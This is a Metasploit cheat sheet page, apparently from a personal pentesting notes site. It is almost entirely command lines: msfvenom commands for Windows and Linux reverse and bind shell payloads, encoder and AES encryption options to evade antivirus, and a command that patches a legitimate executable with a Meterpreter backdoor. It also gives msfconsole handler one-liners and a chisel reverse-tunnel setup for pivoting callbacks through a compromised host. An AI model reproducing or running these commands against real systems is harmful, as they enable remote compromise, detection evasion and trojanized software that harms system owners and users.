Metasploit

Handler C2 Meterpreter

msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST <listening_host>;set LPORT <listening_port>;run;"

Payload Windows

Reverse Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe

Bind Shell

msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f exe > bind.exe

Payload Linux

Reverse Shell

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf

Bind Shell

msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > bind.elf

Metasploit Encoder

msfvenom --list encoders

# x86/shikata_ga_nai
# reverse shell  x86
sudo msfvenom -p windows/meterpreter/reverse_https LHOST=10.10.x.y LPORT=443 -e x86/shikata_ga_nai -f exe -o shell.exe

# x64
sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.x.y LPORT=443 -e x64/zutto_dekiru -f exe -o shell64.exe

# patch the legit exe with payload

sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.x.y LPORT=443 -e <encoder> -x <legit exe> -f exe -o shell_legit.exe

msfvenom --list encrypt

sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.x.y LPORT=443 --encrypt aes256 --encrypt-key <the key> -f exe -o shell_aes.exe

Metasploit Reverse Payload with Reverse Individual Proxy

tunnel reference:

Port Forwarding with C... | 0xBEN - Notes & Cheat Sheets

Compromised Machine

./chisel server --reverse --port 8000

Kali Linux

format: chisel client <server chisel>:<port> R:<linux port>:127.0.0.1:

chisel client 192.168.11.4:8000 R:50001:127.0.0.1:443

Generate Payload:

set LHOST to reachable port in compromised machine from target machine.

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.56.107 LPORT=50001 -f exe > proxy_payload.exe

Handler C2 Meterpreter:

because the tunnel set directly to loopback, make sure the LHOST is also loopback (127.0.0.1)

sudo msfconsole -x "use exploit/multi/handler;set payload windows/x64/meterpreter/reverse_https;set LHOST 127.0.0.1;set LPORT 443;run;"

reference:

https://medium.com/@techmindxperts/complete-guide-to-metasploit-from-installation-to-exploit-development-eb89a507c07d

https://book.hacktricks.xyz/generic-methodologies-and-resources/reverse-shells/msfvenom

PreviousInvoke-ReflectivePEInjection NextMeterpreter Tricks

Last updated 7 months ago